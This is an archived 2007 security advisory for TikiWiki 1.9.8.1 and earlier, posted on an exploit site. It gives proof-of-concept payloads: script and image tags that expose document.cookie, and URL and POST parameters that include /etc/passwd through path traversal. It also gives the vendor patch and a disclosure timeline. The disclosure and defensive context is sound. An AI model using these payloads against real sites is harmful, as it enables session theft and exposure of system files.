Home / exploits tikiwiki-xsslfi.txt
Posted on 26 October 2007
====================================================================== TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion ====================================================================== Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting Local File Inclusion Status: patch available ------------------------------ Affected software description: ------------------------------ Application: TikiWiki Version: <= 1.9.8.1 Vendor: http://tikiwiki.org Description: TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution. -------------- Vulnerability: -------------- XSS: 1. The password reminder page is vulnerable to cross site scripting. 2. Script code can be embedded into wiki-pages. 3. The script db/tiki-db.php is vulnerable to cross site scripting LFI: 4. The script db/tiki-db.php is vulnerable to local file inclusion attacks. 5. The script tiki-imexport_languages.php is vulnerable to local file inclusion attacks. ------------ PoC/Exploit: ------------ XSS: 1. enter in the form: <img src="javascript:alert(document.cookie)"> URL: http://localhost/tikiwiki/tiki-remind_password.php POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E remind=send+me+my+password 2. create wiki page with: {img src=javascript:alert(document.cookie) } 3. http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script> LFI: 4. register_globals required: http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd 5. feature lang_use_db(use database for translation) must be activated: URL: http://localhost/tikiwiki/tiki-imexport_languages.php POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import --------- Solution: --------- update to 1.9.8.2 or above: https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549 --------- Timeline: --------- 23.10.2007 - vendor informed 25.10.2007 - vendor released patch 25.10.2007 - public disclosure